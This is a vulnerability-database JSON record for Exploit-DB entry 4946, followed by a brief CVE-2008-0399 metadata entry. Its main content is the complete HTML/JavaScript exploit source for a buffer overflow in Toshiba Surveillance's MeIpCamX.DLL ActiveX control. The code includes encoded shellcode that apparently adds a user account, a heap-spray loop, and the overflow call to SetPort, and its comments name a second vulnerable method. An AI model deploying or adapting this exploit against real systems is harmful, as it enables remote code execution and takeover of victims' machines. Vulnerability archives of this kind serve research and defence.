{"bulletinFamily": "exploit", "id": "EDB-ID:4946", "cvelist": ["CVE-2008-0399"], "modified": "2008-01-20T00:00:00", "lastseen": "2016-01-31T21:09:55", "edition": 1, "sourceData": "<!--\nToshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote\nbuffer overflow exploit (IE7/xpsp2)\n\na demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio\ncodebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab\n\nrgod-tsid-pa-he-ru-ka\n-\nstay tuned with us ...\nhttp://retrogod.altervista.org/join.html\nsecurity feeds, radio streams, techno/drum & bass stations to come\n-->\n<html>\n<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />\n</object>\n<script language=\"javascript\">\n///add su one, user: sun pass: tzu\nshellcode = unescape(\"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949\" +\n \"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a\" +\n \"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241\" +\n \"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c\" +\n \"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c\" +\n \"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f\" +\n \"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b\" +\n \"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c\" +\n \"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871\" +\n \"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835\" +\n \"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b\" +\n \"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b\" +\n \"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34\" +\n \"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35\" +\n \"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550\" +\n \"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b\" +\n \"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c\" +\n \"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943\" +\n \"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370\" +\n \"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377\" +\n \"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630\" +\n \"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265\" +\n \"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330\" +\n \"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574\" +\n \"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030\" +\n \"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f\" +\n \"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e\" +\n \"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242\" +\n \"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741\" +\n \"%u7734%u4734%u4570\");\nbigblock = unescape(\"%u9090%u9090\");\nheadersize = 20;\nslackspace = headersize+shellcode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+shellcode}\n\n //thx to Solar Designer and metasploit crew, is always intended\n\npuf=\"\"; for (i=0;i<28;i++){puf = puf + unescape(\"%0e\")} //no more than 28, otherwise you fall in seh tricks\nRecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself\n</script>\n</html>\n\n# milw0rm.com [2008-01-20]\n", "published": "2008-01-20T00:00:00", "href": "https://www.exploit-db.com/exploits/4946/", "osvdbidlist": ["40519"], "reporter": "rgod", "hash": "27f60e74cc46e2fc04126514df0ef13b841eaf8f33a20fe7a612afb0e2ab1aef", "title": "Toshiba Surveillance MeIpCamX.DLL 1.0.0.4 Remote BoF Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4946/", "enchantments": {"vulnersScore": 5.4}}

{"result": {"cve": [{"id": "CVE-2008-0399", "type": "cve", "title": "CVE-2008-0399", "description": "Multiple buffer overflows in Toshiba Surveillance (Surveillix) RecordSend ActiveX control (MeIpCamX.DLL 1.0.0.4) allow remote attackers to execute arbitrary code via long arguments to the (1) SetPort and (2) SetIpAddress methods.", "published": "2008-01-23T07:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0399", "cvelist": ["CVE-2008-0399"], "lastseen": "2017-09-29T14:25:43"}]}}